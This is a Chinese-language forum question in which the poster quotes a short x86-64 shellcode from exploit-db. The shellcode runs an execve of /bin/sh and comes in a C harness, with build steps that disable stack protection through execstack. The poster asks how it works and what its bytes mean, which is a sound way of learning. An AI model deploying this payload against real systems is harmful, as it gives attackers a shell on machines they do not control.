我在https://www.exploit-db.com/exploits/39624/找到了这个 shellcode :
#include <stdio.h>
char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
void main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) sh;
(int)(*func)();
}
指示:
如何运行
$ gcc -o sh_shell sh_shell.c
$ execstack -s sh_shell
$ ./sh_shell
有人可以解释它实际上是如何工作的吗?
它会在哪些方面对某物造成伤害?
是sh
用来做什么的?("뀋_H1ҀR^j;X耰bin/sh"
(unicode)或"�_H1�R^j;X�����/bin/sh"
(ASCII)没有多大意义,除了最后6个字符,前面的那些字符是什么?)